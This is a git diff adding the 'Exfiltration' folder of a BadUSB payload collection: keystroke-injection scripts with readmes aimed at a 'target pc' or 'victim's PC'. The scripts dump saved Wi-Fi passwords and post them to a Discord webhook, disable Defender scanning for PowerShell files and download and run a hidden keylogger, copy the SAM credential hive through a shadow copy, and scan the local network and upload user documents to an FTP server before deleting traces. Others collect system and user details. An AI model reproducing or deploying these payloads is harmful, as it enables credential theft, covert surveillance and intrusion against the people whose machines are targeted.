b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/General_PC_Information/General_PC_Information.txt @@ -0,0 +1,19 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Saves some general Information about the target pc to a file. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 750 +WINDOWS d +DELAY 900 +WINDOWS r +DELAY 900 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 900 +ALT y +DELAY 900 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; $style = ''; $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-34231960.html'; $Report = $Report + "

Walkuer Ghost Report



Generated on: $Date


"; $SysBootTime = Get-WmiObject Win32_OperatingSystem; $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime; $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME); $SerialNo = $SysSerialNo.SerialNumber; $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model; $SysManufacturer = $SysInfo.Manufacturer; $SysModel = $SysInfo.Model; $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption; $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"; $HD = [math]::truncate($disk.Size / 1GB); $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB); $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize; $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB); $SysCpu = Get-WmiObject Win32_Processor | Select Name; $Cpu = $SysCpu.Name; $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber; $HardSerialNo = $HardSerial.SerialNumber; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name; $graphicsCard = gwmi win32_VideoController |select Name; $graphics = $graphicsCard.Name; $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1; $DriveLetter = $CDDrive.Drive; $DriveName = $CDDrive.Caption; $Disk = $DriveLetter + '\' + $DriveName; $Firewall = New-Object -com HNetCfg.FwMgr; $FireProfile = $Firewall.LocalPolicy.CurrentProfile; $FireProfile = $FireProfile.FirewallEnabled; $Report = $Report + "

Computer Information


Operating System$OS
OS Serial Number:$SerialNo
Current User:$env:USERNAME
System Uptime:$BootTime
System Manufacturer:$SysManufacturer
System Model:$SysModel
Serial Number:$HardSerialNo
Firewall is Active:$FireProfile
"; $Report >> $fileSaveDir'/ComputerInfo-34231960.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip ; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/General_PC_Information/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/General_PC_Information/readme.md new file mode 100644 index 000000000..0b19d9aa1 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/General_PC_Information/readme.md @@ -0,0 +1,39 @@ + +# General_PC_Information +This script saves some general info about the pc into a file. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change path of the file "-DestinationPath PATH TO SAVE FILE HERE\Gather_Informationresults-34231960.zip" + + +## Features + +- open powershell +- exfiltrate pc info +- paste info to a html file + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/GetAllComputerInfo.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/GetAllComputerInfo.txt new file mode 100644 index 000000000..ca4c49312 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/GetAllComputerInfo.txt @@ -0,0 +1,30 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Simple Powershell script that stores alot of Info about the PC into a file. For more info read the comments (REM) in the code below. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 1000 +GUI r +DELAY 450 +REM Start Powershell as Admin +STRING powershell Start-Process powershell -Verb runAs +DELAY 500 +ENTER +DELAY 600 +LEFTARROW +DELAY 600 +ENTER +DELAY 750 +REM Change the "Path" to your path ("C:\..."). +STRING $Path = "PATH" +DELAY 500 +ENTER +DELAY 500 +REM Creates the Results.txt file to the path +STRING New-Item -Path "$Path\Results.txt" -ItemType File +DELAY 500 +ENTER +DELAY 700 +REM Gets all the Info about the PC and stores them into the created Results.txt file +STRING Get-ComputerInfo | Out-File -FilePath "$Path\Results.txt" +DELAY 300 +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/readme.md new file mode 100644 index 000000000..27d8770c4 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/GetAllComputerInfo/readme.md @@ -0,0 +1,39 @@ + +# GetAllComputerInfo +This script saves almost every valuable info about the pc to a file. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change path of the file "STRING $Path = "PATH"" + + +## Features + +- open powershell +- exfiltrate pc info +- paste info to a html file + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/SaveIP_ToDiscordWebhook.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/SaveIP_ToDiscordWebhook.txt new file mode 100644 index 000000000..4e90a8d18 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/SaveIP_ToDiscordWebhook.txt @@ -0,0 +1,12 @@ +REM Author: Startrk1995 +REM Description: Saves the IP of the target pc to a discord webhook. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 500 +GUI r +DELAY 200 +STRING powershell +ENTER +DELAY 1000 +STRING $url="DISCORD WEBHOOK LINK";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/readme.md new file mode 100644 index 000000000..3e3ea514c --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/IP_To_Discord/readme.md @@ -0,0 +1,39 @@ + +# IP_To_Discord +Saves the IP of the target pc to a discord webhook. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change the url of the discord webhook "$url="DISCORD WEBHOOK LINK"" + + +## Features + +- open powershell +- get ip adress +- send file with ip to webhook + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Keylogger/Keylogger.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Keylogger/Keylogger.txt new file mode 100644 index 000000000..2f10fb51b --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Keylogger/Keylogger.txt @@ -0,0 +1,44 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: This script allows you to inject a software keylogger in victim's PC +REM Version: 1.0 +REM Category: Exfiltration +DELAY 2500 +GUI d +DELAY 500 +GUI r +DELAY 500 +STRING powershell.exe -windowstyle hidden +DELAY 200 +CTRL SHIFT ENTER +DELAY 5000 +LEFT +DELAY 150 +ENTER +DELAY 5000 +STRING cd C:\Users\Public\Documents +ENTER +STRING Add-MpPreference -ExclusionExtension ps1 -Force +ENTER +STRING Set-ExecutionPolicy unrestricted -Force +ENTER +STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1 +ENTER +DELAY 3500 +STRING powershell.exe -noexit -windowstyle hidden -file script.ps1 +ENTER +CAPSLOCK +DELAY 150 +CAPSLOCK +DELAY 150 +CAPSLOCK +DELAY 150 +CAPSLOCK +DELAY 2000 +CAPSLOCK +DELAY 150 +CAPSLOCK +DELAY 150 +CAPSLOCK +DELAY 150 +CAPSLOCK +REM End of payload diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Keylogger/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Keylogger/readme.md new file mode 100644 index 000000000..1a6e2de87 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Keylogger/readme.md @@ -0,0 +1,39 @@ + +# Keylogger +This script is only for experienced penetration testers. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change url to a .ps keylogger script "STRING wget (LINK TO KEYLOGGER)" + + +## Features + +- open powershell +- download .ps script +- execute script + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/ListWindowsUpdates.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/ListWindowsUpdates.txt new file mode 100644 index 000000000..0728b3447 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/ListWindowsUpdates.txt @@ -0,0 +1,23 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Saves all installed windows updates to a list. Don't forget to change the path. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 750 +WINDOWS d +DELAY 1500 +WINDOWS r +DELAY 1500 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 1200 +ALT y +DELAY 1200 +GUI UP +DELAY 1200 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-90412137.html';$Report = $Report + "

Walkuer Ghost Report



Generated on: $Date


";$Report = $Report + '

Installed Updates

';$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy);$Report = $Report + '
';$Report >> $fileSaveDir'/ComputerInfo-90412137.html' +ENTER +STRING Compress-Archive -Path $fileSaveDir -DestinationPath results-90412137.zip ; exit +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/readme.md new file mode 100644 index 000000000..f7267c8d1 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/ListWindowsUpdates/readme.md @@ -0,0 +1,39 @@ + +# ListWindowsUpdates +This script is going to save the names of installed windows updates. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change path for the file "-DestinationPath results-90412137.zip" + + +## Features + +- open powershell +- list windows updates +- store them into a file + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Network_Exfiltration/Network_Exfiltration.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Network_Exfiltration/Network_Exfiltration.txt new file mode 100644 index 000000000..5e3b3d91a --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Network_Exfiltration/Network_Exfiltration.txt @@ -0,0 +1,164 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Exfiltrate network. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 800 +GUI r +DELAY 1000 +STRING powershell Start-Process notepad -Verb runAs +ENTER +DELAY 800 +ALT y +DELAY 800 +ENTER +ALT SPACE +DELAY 1000 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') +ENTER +STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime +ENTER +STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory +ENTER +STRING $date = get-date +ENTER +STRING $style = "" +ENTER +STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' +ENTER +STRING $Report = $Report + "

Duck Tool Kit Report



Generated on: $Date


" +ENTER +STRING $Report = $Report + '

User Documents (doc,docx,pdf,rar)

' +ENTER +STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) +ENTER +STRING $Report = $Report + '
' +ENTER +STRING $Report >> $fileSaveDir'/ComputerInfo.html' +ENTER +STRING function copy-ToZip($fileSaveDir){ +ENTER +STRING $srcdir = $fileSaveDir +ENTER +STRING $zipFile = 'C:\Windows\Report.zip' +ENTER +STRING if(-not (test-path($zipFile))) { +ENTER +STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) +ENTER +STRING (dir $zipFile).IsReadOnly = $false} +ENTER +STRING $shellApplication = new-object -com shell.application +ENTER +STRING $zipPackage = $shellApplication.NameSpace($zipFile) +ENTER +STRING $files = Get-ChildItem -Path $srcdir +ENTER +STRING foreach($file in $files) { +ENTER +STRING $zipPackage.CopyHere($file.FullName) +ENTER +STRING while($zipPackage.Items().Item($file.name) -eq $null){ +ENTER +STRING Start-sleep -seconds 1 }}} +ENTER +STRING copy-ToZip($fileSaveDir) +ENTER +STRING $final = 'C:\Windows\Report.zip' +ENTER +STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip" +ENTER +STRING $browser = New-Object System.Net.WebClient +ENTER +STRING $url = New-Object System.Uri($ftpAddr) +ENTER +STRING $browser.UploadFile($url, $final) +ENTER +STRING remove-item $fileSaveDir -recurse +ENTER +STRING remove-item 'C:\Windows\Report.zip' +ENTER +STRING Remove-Item $MyINvocation.InvocationName +ENTER +CTRL s +DELAY 800 +STRING C:\Windows\config-49197.ps1 +ENTER +DELAY 1000 +ALT F4 +DELAY 800 +GUI r +DELAY 800 +STRING powershell Start-Process cmd -Verb runAs +ENTER +DELAY 800 +ALT y +DELAY 1000 +STRING mode con:cols=14 lines=1 +ENTER +ALT SPACE +DELAY 800 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false +ENTER +DELAY 800 +STRING powershell.exe -windowstyle hidden -File C:\Windows\config-49197.ps1 +ENTER +STRING $IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1 +ENTER +STRING $IPAddr = $IP.IPAddress | Select-Object -Index 0 +ENTER +STRING $IPAddr -as [String] +ENTER +STRING $IPa = $IPAddr.Split('.') | Select -Index 0 +ENTER +STRING $IPb = $IPAddr.Split('.') | Select -Index 1 +ENTER +STRING $IPc = $IPAddr.Split('.') | Select -Index 2 +ENTER +STRING $IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.' +ENTER +STRING $Ping = new-object System.Net.Networkinformation.Ping +ENTER +STRING $ScanResults = 1-225..1-225 | ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address +ENTER +STRING $x = 0 +ENTER +STRING $Report = $Report + '

Network Scan Results

' +ENTER +STRING do { +ENTER +STRING $IPResults = $ScanResults | Select-Object -Index $x +ENTER +STRING $CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory +ENTER +STRING $CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname +ENTER +STRING $CurrIP = $IPResults.Address.IPAddressToString +ENTER +STRING $CurrOS = $CompInfo.SystemDirectory +ENTER +STRING $CurrName = $CompInfo.RegisteredUser +ENTER +STRING if ($CompInfo -ne $null){ +ENTER +STRING $Report = $Report + '
' +ENTER +STRING }else{ +ENTER +STRING $Report = $Report + '
'} +ENTER +STRING $x ++ +ENTER +STRING } while ($x -lt $ScanResults.Count) +ENTER +STRING $Report = $Report + '
IP Address:' + $CurrIP + 'Compter Name: ' + $CompName + 'User Name: ' + $CurrName + ' OS: ' + $CurrOS + '
IP Address: ' + $CurrIP + 'Computer Name: NOT KNOWNUser Name: NOT KNOWNOS:NOT KNOWN
' +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Network_Exfiltration/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Network_Exfiltration/readme.md new file mode 100644 index 000000000..d8e71334e --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Network_Exfiltration/readme.md @@ -0,0 +1,41 @@ + +# Exfiltrate Network +This script will exfiltrate the network and uplaod the report to an ftp server. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change the two numbers 1-225 into a number from 1-225 ;) +- "STRING $ScanResults = 1-225..1-225 | ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address " +- Would be --> $ScanResults = 1..169 (for example) + + +## Features + +- open powershell +- exfiltrate network +- upload report to server + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/SAMexfil/SAMexfil.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/SAMexfil/SAMexfil.txt new file mode 100644 index 000000000..d46033923 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/SAMexfil/SAMexfil.txt @@ -0,0 +1,108 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Extracts Security Account Manager of the PC to a file. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 750 +GUI r +DELAY 1000 +STRING powershell Start-Process notepad -Verb runAs +ENTER +DELAY 750 +ALT y +DELAY 750 +ENTER +ALT SPACE +DELAY 1000 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') +ENTER +STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime +ENTER +STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory +ENTER +STRING $date = get-date +ENTER +STRING $style = "" +ENTER +STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' +ENTER +STRING $Report = $Report + "

Duck Tool Kit Report



Generated on: $Date


" +ENTER +STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') +ENTER +STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } +ENTER +STRING $addSlash = $shadow.DeviceObject + '\' +ENTER +STRING cmd /c mklink C:\shadowcopy $addSlash +ENTER +STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir +ENTER +STRING Remove-Item -recurse -force 'C:\shadowcopy' +ENTER +STRING $Report >> $fileSaveDir'/ComputerInfo.html' +ENTER +STRING function copy-ToZip($fileSaveDir){ +ENTER +STRING $srcdir = $fileSaveDir +ENTER +STRING $zipFile = 'C:\Windows\Report.zip' +ENTER +STRING if(-not (test-path($zipFile))) { +ENTER +STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) +ENTER +STRING (dir $zipFile).IsReadOnly = $false} +ENTER +STRING $shellApplication = new-object -com shell.application +ENTER +STRING $zipPackage = $shellApplication.NameSpace($zipFile) +ENTER +STRING $files = Get-ChildItem -Path $srcdir +ENTER +STRING foreach($file in $files) { +ENTER +STRING $zipPackage.CopyHere($file.FullName) +ENTER +STRING while($zipPackage.Items().Item($file.name) -eq $null){ +ENTER +STRING Start-sleep -seconds 1 }}} +ENTER +STRING copy-ToZip($fileSaveDir) +ENTER +STRING remove-item $fileSaveDir -recurse +ENTER +STRING Remove-Item $MyINvocation.InvocationName +ENTER +CTRL s +DELAY 750 +STRING C:\Windows\config-98437.ps1 +ENTER +DELAY 1000 +ALT F4 +DELAY 750 +GUI r +DELAY 500 +STRING powershell Start-Process cmd -Verb runAs +ENTER +DELAY 1000 +ALT y +DELAY 750 +STRING mode con:cols=14 lines=1 +ENTER +ALT SPACE +DELAY 750 +STRING m +DELAY 1000 +DOWNARROW +REPEAT 100 +ENTER +STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false +ENTER +DELAY 750 +STRING powershell.exe -windowstyle hidden -File C:\Windows\config-98437.ps1 +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/SAMexfil/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/SAMexfil/readme.md new file mode 100644 index 000000000..5f810fbbc --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/SAMexfil/readme.md @@ -0,0 +1,39 @@ + +# SAMexfil +This script extracts the Security Account Manager (SAM) of the PC and saves it to a file. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change path for the file "-DestinationPath PATH\results-61748762.zip" + + +## Features + +- open powershell +- copy SAM profile +- store it to a file + + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/USB_And_Harddrive_Information.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/USB_And_Harddrive_Information.txt new file mode 100644 index 000000000..4841e9bd8 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/USB_And_Harddrive_Information.txt @@ -0,0 +1,39 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 750 +WINDOWS d +DELAY 900 +WINDOWS r +DELAY 900 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 900 +ALT y +DELAY 900 +GUI UP +DELAY 900 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '

Walkuer Ghost Report



Generated on: $Date


';$u = 0;$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace);$Report = $Report + '' +ENTER +STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html' +ENTER +STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md new file mode 100644 index 000000000..269abd176 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/USB_And_Harddrive_Information/readme.md @@ -0,0 +1,38 @@ + +# USB_And_Harddrive_Information +Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file. + +## How to use? + +This script is not plug and play. You need to do the following changes: + +- change the path of the file "-DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip" + + +## Features + +- open powershell +- get hardware info +- save infos to a file + + +## Feedback + +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662". + + + + + + +## Support + +For support, contact me via Discord "UNC0V3R3D#8662". + + +## Meta + + +- If you want to sponsor me on Patreon, the link is on my profile. + + diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt new file mode 100644 index 000000000..036c57ced --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Exfiltration/Win_User_Info/Win_User_Info.txt @@ -0,0 +1,21 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Saves some general Info about the current Win-User. +REM Version: 1.0 +REM Category: Exfiltration +DELAY 750 +WINDOWS d +DELAY 900 +WINDOWS r +DELAY 900 +STRING powershell Start-Process powershell -Verb runAs +ENTER +DELAY 750 +LEFTARROW +ENTER +DELAY 900 +ALT y +DELAY 900 +STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "

Walkuer Ghost Report



Generated on: $Date


";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "

User Information


Current User Name:$env:USERNAME
Account Type: $UserType
User SID:$UserSid
Account Domain:$env:USERDOMAIN
Password Required:$UserPass
Current User is Admin:$IsAdmin
";$Report = $Report + "
